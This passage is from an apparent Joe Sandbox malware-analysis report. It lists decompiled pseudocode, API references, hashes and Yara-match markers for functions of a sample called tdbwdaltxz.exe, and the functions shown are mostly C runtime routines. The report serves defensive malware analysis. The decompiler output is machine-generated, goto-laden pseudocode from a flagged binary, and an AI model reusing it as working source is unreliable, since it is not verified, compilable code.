                        			}

                        APIs
                        • _malloc.LIBCMT ref: 0106C936
                          • Part of subcall function 0106C898: __FF_MSGBANNER.LIBCMT ref: 0106C8AF
                          • Part of subcall function 0106C898: __NMSG_WRITE.LIBCMT ref: 0106C8B6
                          • Part of subcall function 0106C898: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,01064F6A,00000000,00000000,00000000,00000000,?,01064E22,00000018,0107E060), ref: 0106C8DB
                        • _free.LIBCMT ref: 0106C949
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AllocHeap_free_malloc
                        • String ID:
                        • API String ID: 2734353464-0
                        • Opcode ID: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction ID: dc3f8c792e18c9b39980655d1c4aa36fb946f7055c4604235f5f4dabf39aaf76
                        • Opcode Fuzzy Hash: 32185979ca455c04534635abed220d5a2d4870b092aeca5e669a4269303301d0
                        • Instruction Fuzzy Hash: C611C632905317AFEB322FB8AD4C69E37ECAF142B0B104566F9C9DA140DB358850C7E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E0106D939(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				LONG* _t20;
                        				signed int _t25;
                        				void* _t31;
                        				LONG* _t33;
                        				void* _t34;
                        				void* _t35;
                        
                        				_t35 = __eflags;
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_push(0xc);
                        				_push(0x107e2f0);
                        				E010668F0(__ebx, __edi, __esi);
                        				_t31 = E0106B2AD(__edx, __edi, _t35);
                        				_t25 =  *0x1080e04; // 0xfffffffe
                        				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                        					E01064D39(0xd);
                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                        					_t33 =  *(_t31 + 0x68);
                        					 *(_t34 - 0x1c) = _t33;
                        					__eflags = _t33 -  *0x10806ac; // 0x10809a8
                        					if(__eflags != 0) {
                        						__eflags = _t33;
                        						if(__eflags != 0) {
                        							__eflags = InterlockedDecrement(_t33);
                        							if(__eflags == 0) {
                        								__eflags = _t33 - 0x10809a8;
                        								if(__eflags != 0) {
                        									E01064ED2(_t33);
                        								}
                        							}
                        						}
                        						_t20 =  *0x10806ac; // 0x10809a8
                        						 *(_t31 + 0x68) = _t20;
                        						_t33 =  *0x10806ac; // 0x10809a8
                        						 *(_t34 - 0x1c) = _t33;
                        						InterlockedIncrement(_t33);
                        					}
                        					 *(_t34 - 4) = 0xfffffffe;
                        					E0106D9D5();
                        				} else {
                        					_t33 =  *(_t31 + 0x68);
                        				}
                        				_t38 = _t33;
                        				if(_t33 == 0) {
                        					E0106526F(_t24, _t29, _t31, _t33, _t38, 0x20);
                        				}
                        				return E01066935(_t33);
                        			}

                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __amsg_exit.LIBCMT ref: 0106D966
                        • __lock.LIBCMT ref: 0106D976
                        • InterlockedDecrement.KERNEL32(?), ref: 0106D993
                        • _free.LIBCMT ref: 0106D9A6
                        • InterlockedIncrement.KERNEL32(010809A8), ref: 0106D9BE
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                        • String ID:
                        • API String ID: 1231874560-0
                        • Opcode ID: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction ID: b9d5ca4917e66ae5fc41927d23d8c33c99505101a283fcf1d3cb919651eef13f
                        • Opcode Fuzzy Hash: 8555e3c5df406a3017f085eac47d66e16d9b02c4bd34fcc7c726227daad61377
                        • Instruction Fuzzy Hash: BD01D672F006229FDB71BFA894047AE7BA9BF05720F140145E8C0B7284C7345540CFE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E010753DE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t24;
                        				void* _t35;
                        				intOrPtr* _t37;
                        				void* _t38;
                        				void* _t39;
                        
                        				_t39 = __eflags;
                        				_push(0xc);
                        				_push(0x107e4d8);
                        				E010668F0(__ebx, __edi, __esi);
                        				_t35 = E0106B2AD(__edx, __edi, _t39);
                        				_t37 = E01064F0A(8, 1);
                        				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                        				_t40 = _t37;
                        				if(_t37 != 0) {
                        					E010702E6(__ebx, __edx, _t35, _t37, __eflags);
                        					E0106D939(__ebx, __edx, _t35, _t37, __eflags);
                        					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                        					 *(_t37 + 4) =  *(_t35 + 0x68);
                        					E01064D39(0xc);
                        					_t5 = _t38 - 4;
                        					 *_t5 =  *(_t38 - 4) & 0x00000000;
                        					__eflags =  *_t5;
                        					E01070061( *_t37);
                        					 *(_t38 - 4) = 0xfffffffe;
                        					E01075A98();
                        					E01064D39(0xd);
                        					 *(_t38 - 4) = 1;
                        					InterlockedIncrement( *(_t37 + 4));
                        					 *(_t38 - 4) = 0xfffffffe;
                        					E01075AA4();
                        					_t24 = _t37;
                        				} else {
                        					 *((intOrPtr*)(E010647CC(_t40))) = 0xc;
                        					_t24 = 0;
                        				}
                        				return E01066935(_t24);
                        			}









                        APIs
                          • Part of subcall function 0106B2AD: __getptd_noexit.LIBCMT ref: 0106B2AE
                          • Part of subcall function 0106B2AD: __amsg_exit.LIBCMT ref: 0106B2BB
                        • __calloc_crt.LIBCMT ref: 01075A15
                          • Part of subcall function 01064F0A: __calloc_impl.LIBCMT ref: 01064F19
                          • Part of subcall function 01064F0A: Sleep.KERNEL32(00000000), ref: 01064F30
                        • __lock.LIBCMT ref: 01075A4B
                        • ___addlocaleref.LIBCMT ref: 01075A57
                        • __lock.LIBCMT ref: 01075A6B
                        • InterlockedIncrement.KERNEL32(?), ref: 01075A7B
                          • Part of subcall function 010647CC: __getptd_noexit.LIBCMT ref: 010647CC
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                        • String ID:
                        • API String ID: 2144732038-0
                        • Opcode ID: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction ID: 1043acd6d51f1a49f064483d55129c3b0f617311525d146038d6eae68df51e63
                        • Opcode Fuzzy Hash: f1cd610e63fba6d31f2805fe87c25fbff99a76ffa80d2a92f7f4f44875e4b6d3
                        • Instruction Fuzzy Hash: 59015A71E41303EEE721BFA498457DC77A0AF65B20F204659E4D4AA2C0CE7559418B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 89%
                        			E00404751(void* __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				void* _v12;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr* _t33;
                        				intOrPtr _t36;
                        				intOrPtr* _t41;
                        				intOrPtr* _t42;
                        				WCHAR* _t47;
                        				intOrPtr _t52;
                        				void* _t55;
                        				intOrPtr* _t56;
                        				intOrPtr _t57;
                        				intOrPtr _t58;
                        				intOrPtr _t61;
                        				intOrPtr _t64;
                        
                        				_t55 = __edx;
                        				_t57 = _a4;
                        				if(_t57 != 0) {
                        					if(_t57 == 2 || _t57 == 1) {
                        						GetModuleFileNameW(0, 0x415d20, 0x104);
                        						 *0x415f88 = 0x415d20;
                        						_t47 =  *0x415f9c; // 0xeb1c56
                        						if(_t47 == 0 ||  *_t47 == 0) {
                        							_t47 = 0x415d20;
                        						}
                        						_v8 = 0;
                        						_v16 = 0;
                        						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
                        						if(_t61 != 0) {
                        							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                        							if(_t57 != 1) {
                        								_push( &_v12);
                        								_v12 = 0;
                        								_t58 = E00406A91(0, _t55, _t57, _t61);
                        								if(_t58 == 0) {
                        									_t56 = _v12;
                        									_t52 = 0;
                        									_t33 = _t56;
                        									if( *_t56 == 0) {
                        										L17:
                        										 *0x415f8c = _t52;
                        										_v12 = 0;
                        										 *0x415f94 = _t56;
                        										E0040650B(0);
                        										_t58 = 0;
                        										L18:
                        										_v12 = 0;
                        										E0040650B(_t61);
                        										_t36 = _t58;
                        										goto L19;
                        									} else {
                        										goto L16;
                        									}
                        									do {
                        										L16:
                        										_t33 = _t33 + 4;
                        										_t52 = _t52 + 1;
                        									} while ( *_t33 != 0);
                        									goto L17;
                        								}
                        								E0040650B(_v12);
                        								goto L18;
                        							}
                        							 *0x415f94 = _t61;
                        							 *0x415f8c = _v8 - 1;
                        							goto L12;
                        						} else {
                        							_t41 = E0040649B();
                        							_push(0xc);
                        							_pop(0);
                        							 *_t41 = 0;
                        							L12:
                        							E0040650B(0);
                        							_t36 = 0;
                        							L19:
                        							goto L20;
                        						}
                        					} else {
                        						_t42 = E0040649B();
                        						_t64 = 0x16;
                        						 *_t42 = _t64;
                        						E004062A0();
                        						_t36 = _t64;
                        						L20:
                        						return _t36;
                        					}
                        				}
                        				return 0;
                        			}





















                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: W$ ]A$C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                        • API String ID: 0-1602161335
                        • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                        • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                        • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                        • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061860(WCHAR* _a4) {
                        				signed int _t12;
                        				signed int _t13;
                        				WCHAR* _t14;
                        
                        				_t14 = _a4;
                        				lstrcpyW(_t14, _a4);
                        				_t13 = lstrlenW(_t14);
                        				if(_t13 == 0) {
                        					L6:
                        					if(_t14[_t13] != 0x2e) {
                        						lstrcatW(_t14, L".msi");
                        						return _t14;
                        					} else {
                        						return 0;
                        					}
                        				}
                        				while(1) {
                        					_t12 = _t14[_t13] & 0x0000ffff;
                        					if(_t12 == 0x2e || _t12 == 0x5c || _t12 == 0x2f) {
                        						goto L6;
                        					}
                        					_t13 = _t13 - 1;
                        					if(_t13 != 0) {
                        						continue;
                        					}
                        					goto L6;
                        				}
                        				goto L6;
                        			}







                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: .msi
                        • API String ID: 3050337572-299543723
                        • Opcode ID: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction ID: 2b28503e8b71544921f1983f65dbd0f03f0ede55411e0eb7ba914dc37040f837
                        • Opcode Fuzzy Hash: 3b09ad3a8fbdbe7cdc998e1f4faaa26930044050e93616d21fe2138c483037aa
                        • Instruction Fuzzy Hash: F7F05536A012146F8F761B9D94084BEBBDCEFD56A23544866F6C4C6100DB34C4A083D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402BE3(WCHAR* _a4) {
                        				struct HINSTANCE__* _t4;
                        
                        				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                        				if(_t4 != 0) {
                        					return _t4;
                        				} else {
                        					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
                        						return 0;
                        					}
                        					return LoadLibraryExW(_a4, 0, 0);
                        				}
                        			}





                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                        • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                        • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                        • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                        • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E0106BB78(void* __ecx) {
                        				signed int _v8;
                        				_Unknown_base(*)()* _t5;
                        
                        				_v8 = _v8 & 0x00000000;
                        				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
                        				if(_t5 == 0) {
                        					L3:
                        					return 0;
                        				} else {
                        					_push(0);
                        					_push( &_v8);
                        					if( *_t5() != 0x7a) {
                        						goto L3;
                        					} else {
                        						return 1;
                        					}
                        				}
                        			}






                        APIs
                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 0106BB8A
                        • GetProcAddress.KERNEL32(00000000), ref: 0106BB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.519471774.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000002.00000002.519460950.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519499181.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519520197.0000000001080000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.519530277.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCurrentPackageId$kernel32.dll
                        • API String ID: 1646373207-142416881
                        • Opcode ID: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction ID: ea2607807590a304c42193e561659faa15b428e87842daefd1ed2d67b785583c
                        • Opcode Fuzzy Hash: 53a7a10c1d36222a13d0a6c38533c6d58b2c9b7ab5289691280d944f4fca133f
                        • Instruction Fuzzy Hash: F0E0C272FA030866EB2567F1EC0AF5B369C9700649F100858B197F1080DAB8D20182A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                        				char _v16;
                        				signed int _v20;
                        				char _v28;
                        				char _v35;
                        				signed char _v36;
                        				void _v44;
                        				signed char* _v48;
                        				char _v49;
                        				long _v56;
                        				long _v60;
                        				intOrPtr _v64;
                        				struct _OVERLAPPED* _v68;
                        				signed int _v72;
                        				signed char* _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				void _v92;
                        				long _v96;
                        				signed char* _v100;
                        				void* _v104;
                        				char _v108;
                        				int _v112;
                        				intOrPtr _v116;
                        				struct _OVERLAPPED* _v120;
                        				struct _OVERLAPPED* _v124;
                        				struct _OVERLAPPED* _v128;
                        				struct _OVERLAPPED* _v132;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t174;
                        				signed int _t175;
                        				signed int _t177;
                        				int _t183;
                        				signed char* _t186;
                        				signed int _t190;
                        				signed char _t191;
                        				intOrPtr _t194;
                        				void* _t196;
                        				long _t197;
                        				long _t201;
                        				signed char* _t207;
                        				void _t209;
                        				signed char* _t214;
                        				void* _t221;
                        				char _t224;
                        				char* _t228;
                        				void* _t237;
                        				long _t243;
                        				signed int _t244;
                        				signed char* _t245;
                        				void* _t255;
                        				intOrPtr _t261;
                        				void* _t262;
                        				struct _OVERLAPPED* _t263;
                        				intOrPtr* _t264;
                        				signed int _t265;
                        				intOrPtr _t266;
                        				signed int _t271;
                        				struct _OVERLAPPED* _t274;
                        				signed int _t276;
                        				signed char _t281;
                        				signed int _t285;
                        				signed char* _t286;
                        				struct _OVERLAPPED* _t289;
                        				void* _t292;
                        				signed int _t293;
                        				signed int _t295;
                        				struct _OVERLAPPED* _t296;
                        				signed char* _t298;
                        				intOrPtr* _t299;
                        				void* _t300;
                        				signed int _t301;
                        				long _t302;
                        				signed int _t304;
                        				signed int _t305;
                        				void* _t306;
                        				void* _t307;
                        				void* _t308;
                        
                        				_push(0xffffffff);
                        				_push(0x40d469);
                        				_push( *[fs:0x0]);
                        				_t307 = _t306 - 0x74;
                        				_t174 =  *0x415010; // 0xcf17a32a
                        				_t175 = _t174 ^ _t305;
                        				_v20 = _t175;
                        				_push(_t175);
                        				 *[fs:0x0] =  &_v16;
                        				_t177 = _a8;
                        				_t298 = _a12;
                        				_t261 = _a20;
                        				_t265 = (_t177 & 0x0000003f) * 0x38;
                        				_t285 = _t177 >> 6;
                        				_v100 = _t298;
                        				_v64 = _t261;
                        				_v72 = _t285;
                        				_v84 = _t265;
                        				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
                        				_v88 = _a16 + _t298;
                        				_t183 = GetConsoleOutputCP();
                        				_t309 =  *((char*)(_t261 + 0x14));
                        				_v112 = _t183;
                        				if( *((char*)(_t261 + 0x14)) == 0) {
                        					E00405940(_t261, _t285, _t309);
                        				}
                        				_t299 = _a4;
                        				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
                        				asm("stosd");
                        				_v116 = _t266;
                        				asm("stosd");
                        				asm("stosd");
                        				_t186 = _v100;
                        				_t286 = _t186;
                        				_v48 = _t286;
                        				if(_t186 < _v88) {
                        					_t293 = _v84;
                        					_t263 = 0;
                        					_v76 = 0;
                        					while(1) {
                        						_v49 =  *_t286;
                        						_t190 = _v72;
                        						_v68 = _t263;
                        						_v56 = 1;
                        						if(_t266 != 0xfde9) {
                        							goto L22;
                        						}
                        						_t274 = _t263;
                        						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
                        						_v76 = _t228;
                        						while( *_t228 != 0) {
                        							_t274 =  &(_t274->Internal);
                        							_t228 = _t228 + 1;
                        							if(_t274 < 5) {
                        								continue;
                        							}
                        							break;
                        						}
                        						_t295 = _v88 - _t286;
                        						_v56 = _t274;
                        						if(_t274 <= 0) {
                        							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
                        							_v80 = _t276;
                        							__eflags = _t276 - _t295;
                        							if(_t276 > _t295) {
                        								__eflags = _t295;
                        								if(_t295 <= 0) {
                        									goto L44;
                        								} else {
                        									_t301 = _v84;
                        									do {
                        										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
                        										_t263 =  &(_t263->Internal);
                        										__eflags = _t263 - _t295;
                        									} while (_t263 < _t295);
                        									goto L43;
                        								}
                        								L52:
                        							} else {
                        								_v132 = _t263;
                        								__eflags = _t276 - 4;
                        								_v128 = _t263;
                        								_v60 = _t286;
                        								_v56 = (_t276 == 4) + 1;
                        								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
                        								_t308 = _t307 + 0x14;
                        								__eflags = _t237 - 0xffffffff;
                        								if(_t237 != 0xffffffff) {
                        									_t293 = _v84;
                        									goto L21;
                        								}
                        							}
                        						} else {
                        							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
                        							_v60 = _t243;
                        							_t244 = _t243 - _t274;
                        							_v80 = _t244;
                        							if(_t244 > _t295) {
                        								__eflags = _t295;
                        								if(_t295 > 0) {
                        									_t245 = _v48;
                        									_t302 = _v56;
                        									do {
                        										_t281 =  *((intOrPtr*)(_t263 + _t245));
                        										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
                        										_t263 =  &(_t263->Internal);
                        										_t286[_t302 + 0x2e] = _t281;
                        										__eflags = _t263 - _t295;
                        									} while (_t263 < _t295);
                        									L43:
                        									_t299 = _a4;
                        								}
                        								L44:
                        								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
                        							} else {
                        								_t296 = _t263;
                        								_t264 = _v76;
                        								do {
                        									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
                        									_t296 =  &(_t296->Internal);
                        									_t264 = _t264 + 1;
                        								} while (_t296 < _t274);
                        								_t303 = _v80;
                        								_t263 = 0;
                        								if(_v80 > 0) {
                        									E00403120( &_v28 + _t274, _t286, _t303);
                        									_t274 = _v56;
                        									_t307 = _t307 + 0xc;
                        								}
                        								_t293 = _v84;
                        								_t289 = _t263;
                        								_t304 = _v72;
                        								do {
                        									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
                        									_t289 =  &(_t289->Internal);
                        								} while (_t289 < _t274);
                        								_t299 = _a4;
                        								_v108 =  &_v28;
                        								_v124 = _t263;
                        								_v120 = _t263;
                        								_v56 = (_v60 == 4) + 1;
                        								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
                        								_t308 = _t307 + 0x14;
                        								if(_t255 != 0xffffffff) {
                        									L21:
                        									_t197 =  &(_v48[_v80]) - 1;
                        									L31:
                        									_v48 = _t197 + 1;
                        									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
                        									_t307 = _t308 + 0x20;
                        									_v60 = _t201;
                        									if(_t201 != 0) {
                        										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
                        											L50:
                        											 *_t299 = GetLastError();
                        										} else {
                        											_t286 = _v48;
                        											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
                        											_v76 = _t207;
                        											 *(_t299 + 4) = _t207;
                        											if(_v96 >= _v60) {
                        												if(_v49 != 0xa) {
                        													L38:
                        													if(_t286 < _v88) {
                        														_t266 = _v116;
                        														continue;
                        													}
                        												} else {
                        													_t209 = 0xd;
                        													_v92 = _t209;
                        													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
                        														goto L50;
                        													} else {
                        														if(_v96 >= 1) {
                        															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
                        															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
                        															_t286 = _v48;
                        															_v76 =  *(_t299 + 4);
                        															goto L38;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L51;
                        						L22:
                        						_t271 =  *(0x4160f8 + _t190 * 4);
                        						_v80 = _t271;
                        						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
                        						__eflags = _t191 & 0x00000004;
                        						if((_t191 & 0x00000004) == 0) {
                        							_t271 =  *_t286 & 0x000000ff;
                        							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
                        							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
                        							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
                        								_push(_v64);
                        								_push(1);
                        								_push(_t286);
                        								goto L29;
                        							} else {
                        								_t214 =  &(_t286[1]);
                        								_v60 = _t214;
                        								__eflags = _t214 - _v88;
                        								if(_t214 >= _v88) {
                        									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
                        									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
                        									 *(_t299 + 4) =  &(_v76[1]);
                        								} else {
                        									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
                        									_t308 = _t307 + 0x10;
                        									__eflags = _t221 - 0xffffffff;
                        									if(_t221 != 0xffffffff) {
                        										_t197 = _v60;
                        										goto L31;
                        									}
                        								}
                        							}
                        						} else {
                        							_push(_v64);
                        							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
                        							_t224 =  *_t286;
                        							_v35 = _t224;
                        							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
                        							_push(2);
                        							_push( &_v36);
                        							L29:
                        							_push( &_v68);
                        							_t196 = E0040942F(_t271, _t286);
                        							_t308 = _t307 + 0x10;
                        							__eflags = _t196 - 0xffffffff;
                        							if(_t196 != 0xffffffff) {
                        								_t197 = _v48;
                        								goto L31;
                        							}
                        						}
                        						goto L51;
                        					}
                        				}
                        				L51:
                        				 *[fs:0x0] = _v16;
                        				_pop(_t292);
                        				_pop(_t300);
                        				_pop(_t262);
                        				__eflags = _v20 ^ _t305;
                        				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
                        				goto L52;
                        			}

                        APIs
                        • GetConsoleOutputCP.KERNEL32(CF17A32A,00000000,00000000,00000008), ref: 00409FF0
                          • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                        • GetLastError.KERNEL32 ref: 0040A32B
                        Memory Dump Source
                        • Source File: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_tdbwdaltxz.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                        • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
